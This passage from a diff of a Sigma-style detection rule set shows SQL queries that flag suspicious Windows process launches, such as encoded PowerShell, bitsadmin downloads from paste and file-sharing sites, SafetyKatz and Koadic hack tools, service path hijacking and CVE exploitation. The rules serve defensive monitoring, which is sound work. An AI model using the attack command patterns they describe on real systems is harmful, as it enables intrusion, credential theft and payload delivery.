'%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%InstallScreenSaver%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_etw_trace_evasion.yml" + "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml" }, { - "title": "TAIDOOR RAT DLL Load", - "id": "d1aa3382-abab-446f-96ea-4de52908210b", + "title": "Remote Access Tool - LogMeIn Execution", + "id": "d85873ef-a0f8-4c48-a53a-6b621f11729d", "status": "test", - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "falsepositives": [ + "Legitimate use" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'LMIGuardianSvc' OR Product = 'LMIGuardianSvc' OR Company = 'LogMeIn, Inc.'))" + ], + "filename": "proc_creation_win_remote_access_tools_logmein.yml" + }, + { + "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", + "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1055.001" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Some legitimate apps use this, but limited." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_taidoor.yml" + "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" }, { - "title": "Potential BearLPE Exploitation", - "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "title": "Suspicious Encoded PowerShell Command Line", + "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", "status": "test", - "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", - "author": "Olaf Hartong", + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" - ], - "falsepositives": [ - "Unknown" + "attack.execution", + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\' OR CommandLine LIKE '% BA^J e-%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '% -ExecutionPolicy remotesigned %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_bearlpe.yml" + "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" }, { - "title": "RunDLL32 Spawning Explorer", - "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "title": "Exchange PowerShell Snap-Ins Usage", + "id": "25676e10-2121-446e-80a4-71ff8506af47", "status": "experimental", - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", - "author": "elhoim, CD_ROM_", + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", + "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_spawn_explorer.yml" + "filename": "proc_creation_win_powershell_snapins_hafnium.yml" }, { - "title": "Potential CVE-2022-29072 Exploitation Attempt", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", - "status": "experimental", - "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", - "author": "frack113", + "title": "HackTool - Koadic Execution", + "id": "5cddf373-ef00-4112-ad72-960ac29bac34", + "status": "test", + "description": "Detects command line parameters used by Koadic hack tool", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "cve.2022.29072" + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" + "filename": "proc_creation_win_hktl_koadic.yml" }, { - "title": "HackTool - SafetyKatz Execution", - "id": "b1876533-4ed5-4a83-90f3-b8645840a413", + "title": "Powershell Inline Execution From A File", + "id": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", "status": "experimental", - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], + "description": "Detects inline execution of PowerShell code from a file", + "author": "frack113", "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command %' ESCAPE '\\' OR CommandLine LIKE '%icm %' ESCAPE '\\') AND (CommandLine LIKE '%cat %' ESCAPE '\\' OR CommandLine LIKE '%get-content %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\') AND CommandLine LIKE '% -raw%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_safetykatz.yml" + "filename": "proc_creation_win_powershell_exec_data_file.yml" }, { - "title": "Windows Defender Download Activity", - "id": "46123129-1024-423e-9fae-43af4a0fa9a5", + "title": "NtdllPipe Like Activity Execution", + "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", "status": "test", - "description": "Detect the use of Windows Defender to download payloads", - "author": "Matthew Matchen", + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" }, { - "title": "WMI Persistence - Script Event Consumer", - "id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "title": "Suspicious Service Path Modification", + "id": "138d3531-8793-4f50-a2cd-f291b2863d78", "status": "test", - "description": "Detects WMI script event consumers", - "author": "Thomas Patzke", + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "attack.t1546.003" + "attack.t1543.003" ], - "falsepositives": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + "falsepositives": [ + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml" + "filename": "proc_creation_win_sc_service_path_modification.yml" }, { - "title": "Use of Mftrace.exe", - "id": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", - "status": "experimental", - "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", + "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "status": "test", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Legitimate use for tracing purposes" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR OriginalFileName = 'mftrace.exe') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) OR ParentProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_mftrace.yml" + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" }, { - "title": "Exploiting CVE-2019-1388", - "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "status": "stable", - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "title": "Use of W32tm as Timer", + "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "status": "experimental", + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.discovery", + "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + "filename": "proc_creation_win_w32tm.yml" }, { - "title": "Suspicious Outlook Child Process", - "id": "208748f7-881d-47ac-a29c-07ea84bf691d", + "title": "Suspicious LOLBIN AccCheckConsole", + "id": "0f6da907-5854-4be6-859a-e9958747b0aa", "status": "test", - "description": "Detects a suspicious process spawning from an Outlook process.", - "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the UI Accessibility Checker" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" }, { - "title": "Parent in Public Folder Suspicious Process", - "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", + "title": "Winrar Compressing Dump Files", + "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "status": "experimental", - "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.collection", + "attack.t1560.001" + ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" + "filename": "proc_creation_win_winrar_dmp.yml" }, { - "title": "Potential Suspicious Registry File Imported Via Reg.EXE", - "id": "62e0298b-e994-4189-bc87-bc699aa62d97", - "status": "experimental", - "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ], + "title": "Suspicious IIS Module Registration", + "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", + "status": "test", + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "author": "Florian Roth (Nextron Systems), Microsoft (idea)", "falsepositives": [ - "Legitimate import of keys" + "Administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% import %' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml" + "filename": "proc_creation_win_iis_susp_module_registration.yml" }, { - "title": "Potential Dridex Activity", - "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", - "status": "stable", - "description": "Detects potential Dridex acitvity via specific process patterns", - "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Conhost.exe CommandLine Path Traversal", + "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "status": "experimental", + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.discovery", - "attack.t1135", - "attack.t1033" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\excel.exe' ESCAPE 